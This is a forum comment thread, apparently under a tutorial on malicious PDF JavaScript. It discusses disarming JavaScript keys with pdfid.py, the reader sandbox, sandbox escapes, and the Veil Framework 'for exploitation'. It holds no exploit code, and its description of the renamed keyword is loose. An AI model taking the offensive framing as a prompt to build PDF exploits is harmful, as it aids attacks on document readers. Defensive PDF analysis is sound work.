Can you send me those PDFs?
And you don't need a sandbox with this,
because you can disarm the JavaScript in the Adobe PDF reader.
The command
python pdfid.py --disarm testfile.pdf
will manually change the /Javascript into /J47d7xnsnsScrript,
therefore not allowing the Adobe PDF JavaScript engine to execute it.
Because in the Adobe PDF reader everything is... god, I can't remember the word.
If it has /Javascript /javascript /JS = those will execute,
but /Ja8d7s899, stuff like that, will not execute.
-
> Can you send me those PDFs?
> And you don't need a sandbox with this,
> because you can disarm the JavaScript in the Adobe PDF reader.
> The command
> python pdfid.py --disarm testfile.pdf
> will manually change the /Javascript into /J47d7xnsnsScrript,
> therefore not allowing the Adobe PDF JavaScript engine to execute it.
> Because in the Adobe PDF reader everything is... god, I can't remember the word.
> If it has /Javascript /javascript /JS = those will execute,
> but /Ja8d7s899, stuff like that, will not execute.
I mean that while learning this is fun, the reader sandbox won't let any embedded exploit make changes to the system. So trying to exploit the JS is useless now, unless you have some way to escape the sandbox.
-
Great tutorial. Thank you!
-GD
-
I am interested in how they make these PDF exploits!
-
> Can you send me those PDFs?
> And you don't need a sandbox with this,
> because you can disarm the JavaScript in the Adobe PDF reader.
> The command
> python pdfid.py --disarm testfile.pdf
> will manually change the /Javascript into /J47d7xnsnsScrript,
> therefore not allowing the Adobe PDF JavaScript engine to execute it.
> Because in the Adobe PDF reader everything is... god, I can't remember the word.
> If it has /Javascript /javascript /JS = those will execute,
> but /Ja8d7s899, stuff like that, will not execute.
Seriously, you don't need to start newlines early and double space. I don't understand why people feel the need to attack the Enter button so much. Just let the editor do it on its own. Otherwise, nice contribution n' shit.
-
This post was actually really helpful, I tested this on some SET obfuscated files and it works. I also have to recommend the "Veil Framework" tool for exploitation. 9/10 great post.